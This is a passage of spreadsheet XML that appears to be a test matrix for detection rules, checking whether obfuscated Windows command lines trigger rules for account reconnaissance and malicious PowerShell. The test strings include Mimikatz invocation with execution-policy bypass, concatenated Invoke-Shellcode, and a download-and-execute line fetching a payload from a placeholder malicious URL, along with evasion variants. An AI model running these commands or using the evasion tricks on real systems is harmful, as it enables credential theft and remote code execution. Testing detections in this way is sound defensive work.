      <c r="G1210" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1210" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1210" s="4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210" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1210" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1211" ht="15.75" customHeight="1" s="42">
      <c r="A1211" s="43" t="n"/>
      <c r="B1211" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1211" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1211" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1211" s="36" t="inlineStr">
        <is>
          <t>net loc^algroup administrators /DO</t>
        </is>
      </c>
      <c r="F1211" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1211" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1211" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1211" s="4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211" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1211" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1212" ht="15.75" customHeight="1" s="42">
      <c r="A1212" s="43" t="n"/>
      <c r="B1212" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1212" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1212" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1212" s="36" t="inlineStr">
        <is>
          <t>net loc^algroup administrators /dO</t>
        </is>
      </c>
      <c r="F1212" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1212" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1212" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1212" s="43" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE (d95de845-b83c-4a9a-8a6a-4fc802ebf6c0); Suspicious Group And Account Reconnaissance Activity Using Net.EXE (d95de845-b83c-4a9a-8a6a-4fc802ebf6c0)</t>
        </is>
      </c>
      <c r="J1212" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1212" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1213" ht="15.75" customHeight="1" s="42">
      <c r="A1213" s="43" t="n"/>
      <c r="B1213" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1213" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1213" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1213" s="36" t="inlineStr">
        <is>
          <t>net localgroup "admin" istrators -"do"</t>
        </is>
      </c>
      <c r="F1213" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1213" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1213" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1213" s="43" t="n"/>
      <c r="J1213" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1213" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1214" ht="15.75" customHeight="1" s="42">
      <c r="A1214" s="43" t="n"/>
      <c r="B1214" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1214" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1214" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1214" s="36" t="inlineStr">
        <is>
          <t>net localgroup "admin" istrators /"do"</t>
        </is>
      </c>
      <c r="F1214" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1214" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1214" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1214" s="36" t="n"/>
      <c r="J1214" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1214" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1215" ht="15.75" customHeight="1" s="42">
      <c r="A1215" s="43" t="n"/>
      <c r="B1215" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1215" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1215" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1215" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-LocalGroupMember -Group 'Administrators'"</t>
        </is>
      </c>
      <c r="F1215" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1215" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1215" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1215" s="36" t="n"/>
      <c r="J1215" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1215" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1216" ht="15.75" customHeight="1" s="42">
      <c r="A1216" s="43" t="n"/>
      <c r="B1216" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1216" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1216" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1216" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -command "Get-LocalGroupMember -Group 'Administrators'"</t>
        </is>
      </c>
      <c r="F1216" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1216" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1216" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1216" s="43" t="n"/>
      <c r="J1216" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1216" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1217" ht="15.75" customHeight="1" s="42">
      <c r="A1217" s="43" t="n"/>
      <c r="B1217" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1217" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1217" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1217" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-LocalGroupMember -Group 'Administrators'"</t>
        </is>
      </c>
      <c r="F1217" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1217" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1217" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1217" s="43" t="n"/>
      <c r="J1217" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1217" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1218" ht="15.75" customHeight="1" s="42">
      <c r="A1218" s="43" t="n"/>
      <c r="B1218" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1218" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1218" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1218" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmAnD "Get-LocalGroupMember -Group 'Administrators'"</t>
        </is>
      </c>
      <c r="F1218" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1218" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1218" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1218" s="43" t="n"/>
      <c r="J1218" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1218" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1219" ht="15.75" customHeight="1" s="42">
      <c r="A1219" s="43" t="n"/>
      <c r="B1219" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1219" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1219" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1219" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "Get-LocalGroupMember -Group 'Administrators'"</t>
        </is>
      </c>
      <c r="F1219" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1219" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1219" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1219" s="36" t="n"/>
      <c r="J1219" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1219" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1220" ht="15.75" customHeight="1" s="42">
      <c r="A1220" s="43" t="n"/>
      <c r="B1220" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1220" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1220" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1220" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F1220" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1220" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1220" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1220" s="43" t="n"/>
      <c r="J1220" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1220" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1221" ht="15.75" customHeight="1" s="42">
      <c r="A1221" s="43" t="n"/>
      <c r="B1221" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1221" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1221" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1221" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F1221" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1221" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1221" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1221" s="36" t="n"/>
      <c r="J1221" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1221" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1222" ht="15.75" customHeight="1" s="42">
      <c r="A1222" s="43" t="n"/>
      <c r="B1222" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1222" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1222" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1222" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F1222" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1222" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1222" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1222" s="43" t="n"/>
      <c r="J1222" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1222" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1223" ht="15.75" customHeight="1" s="42">
      <c r="A1223" s="43" t="n"/>
      <c r="B1223" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1223" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1223" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1223" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1223" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1223" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1223" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I122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223" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1223" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1224" ht="15.75" customHeight="1" s="42">
      <c r="A1224" s="43" t="n"/>
      <c r="B1224" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1224" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1224" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1224" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXeCuTioNpOLICY Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1224" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1224" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1224" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I122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224" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1224" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1225" ht="15.75" customHeight="1" s="42">
      <c r="A1225" s="43" t="n"/>
      <c r="B1225" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1225" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1225" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1225" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1225" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1225" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1225" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I122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225" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1225" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1226" ht="15.75" customHeight="1" s="42">
      <c r="A1226" s="43" t="n"/>
      <c r="B1226" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1226" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1226" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1226" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1226" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1226" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1226" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I122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226" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1226" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1227" ht="15.75" customHeight="1" s="42">
      <c r="A1227" s="43" t="n"/>
      <c r="B1227" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1227" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1227" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1227" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutIoNpolIcy Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1227" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1227" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1227" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I122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227" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1227" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1228" ht="15.75" customHeight="1" s="42">
      <c r="A1228" s="43" t="n"/>
      <c r="B1228" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1228" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1228" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1228" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmmAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1228" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1228" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1228" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I122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228" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1228" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1229" ht="15.75" customHeight="1" s="42">
      <c r="A1229" s="43" t="n"/>
      <c r="B1229" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1229" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1229" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1229" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMMaND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1229" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1229" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1229" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I122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229" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1229" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1230" ht="15.75" customHeight="1" s="42">
      <c r="A1230" s="43" t="n"/>
      <c r="B1230" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1230" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1230" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1230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1230" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1230" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1230" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1230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230" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1230" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1231" ht="15.75" customHeight="1" s="42">
      <c r="A1231" s="43" t="n"/>
      <c r="B1231" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1231" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1231" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1231" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nOnINterACTIVe -ep Bypass -COMmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1231" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1231" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1231" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I123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231" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1231" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1232" ht="15.75" customHeight="1" s="42">
      <c r="A1232" s="43" t="n"/>
      <c r="B1232" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1232" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1232" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1232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1232" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1232" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1232" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1232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232" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1232" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1233" ht="15.75" customHeight="1" s="42">
      <c r="A1233" s="43" t="n"/>
      <c r="B1233" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1233" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1233" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1233" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1233" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1233" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1233" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1233" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1233" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1233" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1234" ht="15.75" customHeight="1" s="42">
      <c r="A1234" s="43" t="n"/>
      <c r="B1234" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1234" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1234" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1234" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1234" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1234" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1234" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1234" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1234" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1234" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1235" ht="15.75" customHeight="1" s="42">
      <c r="A1235" s="43" t="n"/>
      <c r="B1235" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1235" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1235" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1235" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1235" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1235" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1235" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1235" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1235" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1235" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1236" ht="15.75" customHeight="1" s="42">
      <c r="A1236" s="43" t="n"/>
      <c r="B1236" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1236" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1236" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1236" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1236" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1236" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1236" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1236" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1236" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1236" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1237" ht="15.75" customHeight="1" s="42">
      <c r="A1237" s="43" t="n"/>
      <c r="B1237" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1237" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1237" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1237" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1237" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1237" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1237" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1237" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1237" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1237" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1238" ht="15.75" customHeight="1" s="42">
      <c r="A1238" s="43" t="n"/>
      <c r="B1238" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1238" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1238" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1238" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1238" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1238" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1238" s="36" t="b">
        <v>0</v>
      </c>
